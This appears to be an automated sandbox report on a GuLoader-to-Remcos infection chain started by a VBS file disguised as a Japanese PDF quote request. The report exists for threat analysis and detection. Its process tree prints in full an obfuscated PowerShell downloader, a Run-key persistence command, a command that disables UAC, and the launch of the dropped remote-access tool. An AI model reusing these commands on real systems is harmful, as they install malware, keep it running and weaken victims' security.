Resubmissions

25/03/2024, 07:31

240325-jcv47saf79 8

25/03/2024, 03:43

240325-d9zk1aab3v 10

25/03/2024, 03:42

240325-d9pqssfc37 1

25/03/2024, 03:42

240325-d9fswsfc33 1

25/03/2024, 03:19

240325-dt8hzahf8y 10

25/03/2024, 03:01

240325-dh59gahd2z 10

Analysis

  • max time kernel
    147s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/03/2024, 03:01

General

  • Target

    見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs

  • Size

    181KB

  • MD5

    5abfcbce1f90501808379e179feb51c8

  • SHA1

    e305ee8202f579517fe0634e22346584aaf4c148

  • SHA256

    7698fb4c720a5c5810a8b80ae25ef1e6f5185e49cb151ef21937f0788276354e

  • SHA512

    616becc5031d7b1d3e0b08b86a7a90b8a354a2357fe0fafe6e0e16c094eadfea2362452e32169b32f322b2c06e11c79b6220a40c8bd46be7dde21d086c7c2a5b

  • SSDEEP

    3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyC:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVJ

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 2 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\見積依頼先_(OU)_OSAKA-2024100044-05JP·pdf.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3256
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c set /A 115^^0
        3⤵
          PID:3956
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Ironiserende Imborder Hulheden Peabird Lnkens Anstdssten #>;$Pebermynters=(cmd /c set /A 115^^0);Function albertuss ([String]$Armariolum215){$Pebermynters=[char][int]$Pebermynters;$Stikpiller=$Pebermynters+'ubstring';$Mistletoes=8;$Afhudes=Ridefogders($Armariolum215);For($Coapprover=7; $Coapprover -lt $Afhudes; $Coapprover+=$Mistletoes){$Dendropogon=$Armariolum215.$Stikpiller.Invoke($Coapprover, 1);$Konsistorialkontor=$Konsistorialkontor+$Dendropogon;}$Konsistorialkontor;}function Reflectorizing ($Frsteviolin){. ($Rebuffably) ($Frsteviolin);}function Ridefogders ([String]$Sagregisteret){$Enucleator=$Sagregisteret.Length-1;$Enucleator;}$Iatrochemical=albertuss ' RegistTEkspertrContradaHypothenSabelkas ,insenf BoppeneIncongrrBaadskar,enzinti randlonPr,gresg Ag rsk ';$Mynas248=albertuss 'JennifehPredicttExtremitUnm.ddlpMalkendsAurined:Addi,en/attaina/ Zonet dMetamorrIncir,ui OvereavNeuro.aeg.nandr. Indregg GangshoMu keorohemielygChimangl OrbitseUdebliv.PitchpocInterbloElsewismSyvstje/Caratesu PulvercAfklaps?svendepe Byplanx FormprpAkasastoAnaerobr Ver,entBloddon=StephandBazonbuoBughindw Hindign ExocyclThermo o Dueu ta CormacdIndkald&.ectumciAtelierd Narrat=Kveller1Tr nchctAttribunOvervioXd gpengrConvexiXBekranscCowli,ehEndu eovGleaminMBesmokeoPomaryuxGingerlF.ikkestTP,colete skatebWScuddl 7OutdariSLyophillSt.vens3 samariF Ma,vasRArmadae0SkippenmUd.ikli9ri.striy No,trawVestas.4RepaireO agocy3 WranglxFidusku2 C.rameXHollywo ';$Rebuffably=albertuss 'QuintusiSauerkrekvoterexfys,ote ';$Gooseskin=albertuss 'Indko,t$,nderbegSkrofu l FactuaoBastonabPlanetgaUnmeedyl Sieurs:FoleykuPExtenderBrayekoeSubnatua KontincZethstehExclaimeCurnst sMander Sk,somm=Film nd UnsizedS BoghantNigeriaaThermosrPhutplat Forpl.-HathawaBTheodidiEndossetDybl rnsFacitteT minsterM sonsbaFle.gudn MalerlsMultisefNothinge ForstrrKon.ito Underdi-GarageaSSubstano D.urwau An epar Rohanlc ball.teCockney Sideord$A.choreMOpvarmey I,termnhelicota Simu.asNastali2Tr ndse4Renegot8ltgbeck Barrela-KommentD Tekstbe Indb.ss Ventelt VialfuiUngskuen Enter,aSmugkrotKvk eneiImpedimoInf,acenFendill Unci l$Crunc iS Aoua sc ckeeinhRavespoiCorditizHabitaboGerrigtmSuperdeeGenopnardittiesiGadroona Papste ';Reflectorizing (albertuss 'Droumy,$JernfilgIm.odyil offosoLatrantbSkrmstyaD iverel Megaby:StudebaS telepac,egentshSpelliniTronfraztilfileo.isacchmMat.ikeeDhikrsgrFistelsiForfatta Finans=Escadri$LithopheAcidaspnCoregnavUnassai:CyklonbahovedskpFa,keltp TricoldForsy,iaL.vordet remun.aCoun er ') ;Reflectorizing (albertuss 'WienerpIPachy.emZ osporpCytoanaoPseudoprPregaintDr.kneu-SaucepaMOrlogs.oPplretedUndivulu atomf,lAttentie Sauced Cul,asuBPreexchiR mfiretKej,haasMargentTSvrindurCellarea,loakstnWrinklesSt.tikefOrdrerse oct.merAcetona ') ;$Schizomeria=$Schizomeria+'\Bjdens.Ant' ;Reflectorizing (albertuss 'Impa si$popp.ydgForbog,lA,rsagso strobobLoud rbaSneplovlTju.hne: PreconFholarctr DaahinoD.spitusTab lattCombinef Fangstr KaabesiAcajou e DermossSkaberg=propful(Do.beltTInputsteUn.hospsvernonitRuedesc- OliehoPRynkes,aHo,semotEnt,robhRegiste Pharmac$MegaaraSStjernecOver,tthGo,otheiAfskallzKalendeo isorlimPlannedeAfrignirIndkrediFerdiadaBilleds)gormssk ') ;while (-not $Frostfries) {Reflectorizing (albertuss 'Dis ikoIKabsminfFerashs Mon cid(Stormpr$Jg.rsprPFran,kgrIns.lare JiffphaMy.midoc Rit,alh SlangeeSmykkeasFlui.um.Pikt,grJGodkendoTilemakbConferrSHjforrdtA.tokraa RelatitIrasja e Bestse Bunomas-Puk,erheSailyfaqR micat Forske$HalvhedI Ba,kgaaGazernetMishandrAbstineoavisartcGaaretnhHerpesteHeterosmIndbe eiHjlan scKursor.aSaddelml Mammit)Faklen Fortykk{CanafisSInterkitSu erhea Sspejdr Mone.atVetkous-SvedsbySDiagonalBeskydeePointere BambuspMoyit s I.comme1 shiesp}Fjor,reeTjenestlOomancysSoldateeDybdahl{ Tro,heS KondictForkobraBekosterSocialatSanguif- ConchoSEnkeltvlFlygtnieSyno,yme Se.skapKa,abas Delumin1Pigenav;Dobbe rR Diquate ReprodfAndaluslSpati teVideregc Toxifet Udsta.o ,outgjrAnnihili Ant,pazGrundtaidjvlehon iolsflg.hamabl Balloan$ QuelchG Besu.loMetricaoNon,arrsS.aansoeFlimsyssFotoalbkBrillefiMomsersnUnfoxy.}ulovmed ');Reflectorizing (albertuss 'Brnds.l$Hugger,g O ertilOch,mysoRetreatbSkrivesaFor,ikllAfvikli:Unvnel.FParrotsr PedelloB weryls RodenstAffarvef Aley.rr skilniimanac seMismatcsMakvrke=overado(SvartbaTminimereGr.tuitsunddragtpre ect-PortepePRemplacaImprgnetAlbedogh Pe.hyd Hitherw$SpingelSRingstec KolerihObskurfi DressrzSaccomyoUninhibmVarmefreDiphyllrUover,oi Lint.laKapacit)Hjlpepr ') ;}Reflectorizing (albertuss 'Her.eli$ Skon egsubstanlSanatoroHaandhvbCorrivaaTwitchel orrupt:BestialaRibbonenAflnni,tpen estiHypoders F,rtrycInfrasphXylof,noSwollenl L,anabaHalimous rappitTho,ougi Rewardc Rumm naForcibllRet inilHyperthyyagouru Afblegn=Spizzer ForvarmGAtomulyeReprimat Ugelan-AvertdeC NemospoForm ivnAuthorit nlbenpeskilrednBesvrlitSouveni Ron edo$HalvgudSGuldrancTjurhnehMelis aiFriz,grz TilhngoInterprmBeyli.aeE.stemprDeglam.iBgededea,jrnsol ');Reflectorizing (albertuss 'Headsai$ ForesogSynkronlNyttevioUforgngbOceanolaExquisilDrmmesy: Int,rmBUnivocae mennesfAr illeoCy niderRa,iospdUnreturrEuropewiUdenlann BendtlgKarolinsPrsen,am EarpiciLousedtdUnikkesl AfklapeIsoclinrSavedes2D.missi0affress1Armeni, .anebor=Coconu. ,ildoe[ StybbaSCh onicyComproms DinarztP,anetaeFlagermm Resinr. BornhoCKvivaleoMetastanEgelkkevBambu reRaisedarStampemtPutativ]Utu.ten:Gennemb:ElectroF Age.dar Ol enbo Subpiam Sop.edB angensaTactualsKondoleeBlndvrk6 udesth4OligospS BredbatMislighrSwordm,iAdolphcnflorifig svajry(Evoluti$Del.algaIndtrkknFormrketPropolsiRoughlesHol quicPreferehFr.sepuo,nytninl H rregaSolcellsMy tiqutKonneksiTricarbcrkeen.eaBitte.ll,lagterlMarblieyFladetp) Volumi ');Reflectorizing (albertuss ' esecti$Sin.erlgUncocksl ,atrilo Meg spbSuperdua Stern.lAl onym: Wit.edB Nomadel Vol.nttGeosciee Ti sspsFruticut ZygobreKildetedSpirit.eNeologirHeterolsLakerer Tyrerin=Opspori Trafika[InkonseSTrolde yS rannesArchductUnpervee DiphthmHarmoni. Fjer,kTPigmentevisernexUndershtPistill. Er.ticEKaolinsnRe.eldic PartreoAspirandOveranaiTros.amnKoda.isgBerigei]Maddike:Skyndte:PrettyiAKnbjninSMicromeCTnderenI BogsidIUnfooli..ennemsGRedninge OvervitRaafrugSAthrocytCon inurBathyali gazolynFetichigTapestr(.utobio$ ValutaBApathieeZoologifIncaveroLaputapr discladKattefjrVi orisiDraconin.isarmegKaoli,is Urege.m P.rensi Foruredsprng,rl Fusarie UnsocirSte mti2Indhyll0hemmeli1Pollina)Polyr.y ');Reflectorizing (albertuss ' Naturs$UnpagangPro andl Gener onedga,gb SprngsaProbosclEnkelta: EmanerMSovietioOutshamd HammedvKolkhosiCuratiznPragmatdTamponeePurinsbnDrivmid=transvo$RejfernBCand,lllPampin t Neutrae GenoptsAdiaphotThroatle ummertdSalleeteHemocoer Rebaptstimingf.BimahvasNotifi,u Empa sbBo ardosFissipetReferrerpree.apiResi.uan,entefrgDommerk(Kderege3Taragec5Legemli0 Udmeld4Spoke,w3Magneti9Rengjo , Cynanc3Afskrab1 Unperc7gymnasi5 Ukorre0Praefik)Bronkos ');Reflectorizing $Modvinden;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3380
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c set /A 115^^0
            4⤵
              PID:1852
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Modifies registry class
              • Suspicious use of WriteProcessMemory
              PID:4384
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1956
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Melaxuma% -w 1 $Ladys=(Get-ItemProperty -Path 'HKCU:\Hooves\').Handelsordreregistret;%Melaxuma% ($Ladys)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:4064
              • C:\Windows\SysWOW64\cmd.exe
                /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4444
                • C:\Windows\SysWOW64\reg.exe
                  C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
                  6⤵
                  • UAC bypass
                  • Modifies registry key
                  PID:2804
              • C:\ProgramData\Remcos\remcos.exe
                "C:\ProgramData\Remcos\remcos.exe"
                5⤵
                • Executes dropped EXE
                • Modifies registry class
                PID:3556
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:1492

        Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\ProgramData\Remcos\remcos.exe

                Filesize

                504KB

                MD5

                251e51e2fedce8bb82763d39d631ef89

                SHA1

                677a3566789d4da5459a1ecd01a297c261a133a2

                SHA256

                2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9

                SHA512

                3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                673B

                MD5

                bcf7e6cfcc8a6a11785cd484871da9df

                SHA1

                611dfe4e01e13c242d1e80be9b045c1353d0f61d

                SHA256

                5a0fb77a4d67c6d19672418b57e59b2afccdb5b902e2971b334aa8efac972e7a

                SHA512

                841cf9ed0285c7e1474a728831081d1f814d685dff154cdf7a006118f6d3f0437eab99233b7cb8074ba7ad0a1ea472138baa8916e32209cede173393db09d15b

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                5KB

                MD5

                22e79aa7aa0322451169b0f596317371

                SHA1

                fffac880e9b0924315671291d729587dd489e753

                SHA256

                26c664aac237da4c835aed3fe7c42924cf7321a05b1c2fc867ae85d05311345d

                SHA512

                3a1a864cb569e6fc6253c00970838fb8ba2eb6f7d73ec359b41314c1bed7db1ee523203b099f451d805cad94da8381364b50cbc4dd34183b81197b62ffd4e699

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                2KB

                MD5

                ae73da7669431d6182ed2b6e32f9c50b

                SHA1

                d6a50e8c793a38076ba6d3c1a51330d4cefe7d1c

                SHA256

                c6a241bd7c5b06f24f4d8b2081bca073dbf28be5d074d8697ac4c982de2047cd

                SHA512

                2201d05fb6a988619048952529c7d0f81beec714bcec0a7f4aca8d99dcd27bd752026ff5fb352297ce750c0888e60df1958d0d7e2a7106a036be5ac90ef77355

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                3KB

                MD5

                d504221e972e2a55a11fcd37ff8a65f3

                SHA1

                672a2179a364e9eff0e73ee0442b59a6ca653551

                SHA256

                5ff870b4247bef7038a3951f9f51c7e04c93ef2d00a2db616ffd3e97ab3a8539

                SHA512

                82484bd3f4a7b4321dd660f2b21af57a426cea3f2202bc5f9c5bcd1c27cdfbd6050d8b4d455ac4406ed6d99ffc61e5812afc0919956baed817b076fb9506dd33

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                3KB

                MD5

                65639b482f421b4f0b69c0577dde45af

                SHA1

                b24b468bd77562e589985c03afcad1d75860a9b9

                SHA256

                19e8d8a6ff2bf2b0ddb5d93987db9ab05a9db48691db7ec0459cb2cbdd4adcb0

                SHA512

                ac0ebeedd10cddafb451745b69eb33ec263d892778d33989fe6c12123be339f28aa5d6db617817e422dbd556c23f2f483a7781d10a4bee2c5b3e804f19681233

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                3KB

                MD5

                096516060f03f1620d514a7cf7dc7ece

                SHA1

                a88c3bfe2243d3d6fe3521796bb131eab3f38e0c

                SHA256

                b93fc066a8f6e1d222e6fd2ab3c4fa83b2fe550a21e7c1b85b7b972758b178cd

                SHA512

                08688144066e8f4557fc01abc0ad9b27d38e72012eb554d0d9da9ab3d131411ae925ae2f958d5d5443476edd4d8876985f2575a5c4914ac8227c40e5e3610348

              • C:\Users\Admin\AppData\Local\Temp\Skibsskruerne91.txt

                Filesize

                5KB

                MD5

                de60fa125bd8607d7d104d0a66b48bb9

                SHA1

                e719638fa0e3f13a112de168c35e0dd39da1516b

                SHA256

                88ff083beef008e5796945f4da905f9e0f65ac750478fce12ef72a35f0a50e08

                SHA512

                21e8926d4ee48744e8511a9a294f0352fd1f7198b3aeb11700e0df7b136fec393266d8c8ade8fce78336be89cb496800a566795a7c341ed766887db6bf54b47b

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21ku05eb.1cw.ps1

                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              • memory/3256-269-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-293-0x00007FFE10EF0000-0x00007FFE119B1000-memory.dmp

                Filesize

                10.8MB

              • memory/3256-271-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-270-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-272-0x000002DF5C370000-0x000002DF5C396000-memory.dmp

                Filesize

                152KB

              • memory/3256-273-0x000002DF5C5D0000-0x000002DF5C5E4000-memory.dmp

                Filesize

                80KB

              • memory/3256-404-0x00007FFE10EF0000-0x00007FFE119B1000-memory.dmp

                Filesize

                10.8MB

              • memory/3256-268-0x00007FFE10EF0000-0x00007FFE119B1000-memory.dmp

                Filesize

                10.8MB

              • memory/3256-258-0x000002DF43B20000-0x000002DF43B42000-memory.dmp

                Filesize

                136KB

              • memory/3256-302-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3256-301-0x000002DF43B10000-0x000002DF43B20000-memory.dmp

                Filesize

                64KB

              • memory/3380-276-0x0000000002C50000-0x0000000002C60000-memory.dmp

                Filesize

                64KB

              • memory/3380-278-0x00000000055B0000-0x00000000055D2000-memory.dmp

                Filesize

                136KB

              • memory/3380-290-0x00000000060B0000-0x0000000006404000-memory.dmp

                Filesize

                3.3MB

              • memory/3380-291-0x00000000065A0000-0x00000000065BE000-memory.dmp

                Filesize

                120KB

              • memory/3380-292-0x0000000006630000-0x000000000667C000-memory.dmp

                Filesize

                304KB

              • memory/3380-279-0x0000000005DE0000-0x0000000005E46000-memory.dmp

                Filesize

                408KB

              • memory/3380-294-0x0000000007E30000-0x00000000084AA000-memory.dmp

                Filesize

                6.5MB

              • memory/3380-295-0x0000000006B70000-0x0000000006B8A000-memory.dmp

                Filesize

                104KB

              • memory/3380-296-0x0000000007850000-0x00000000078E6000-memory.dmp

                Filesize

                600KB

              • memory/3380-297-0x00000000077E0000-0x0000000007802000-memory.dmp

                Filesize

                136KB

              • memory/3380-298-0x0000000008A60000-0x0000000009004000-memory.dmp

                Filesize

                5.6MB

              • memory/3380-299-0x00000000077B0000-0x00000000077D2000-memory.dmp

                Filesize

                136KB

              • memory/3380-300-0x0000000007A80000-0x0000000007A94000-memory.dmp

                Filesize

                80KB

              • memory/3380-275-0x00000000744D0000-0x0000000074C80000-memory.dmp

                Filesize

                7.7MB

              • memory/3380-277-0x0000000005640000-0x0000000005C68000-memory.dmp

                Filesize

                6.2MB

              • memory/3380-303-0x0000000007CC0000-0x0000000007CC1000-memory.dmp

                Filesize

                4KB

              • memory/3380-304-0x0000000009010000-0x000000000C2CB000-memory.dmp

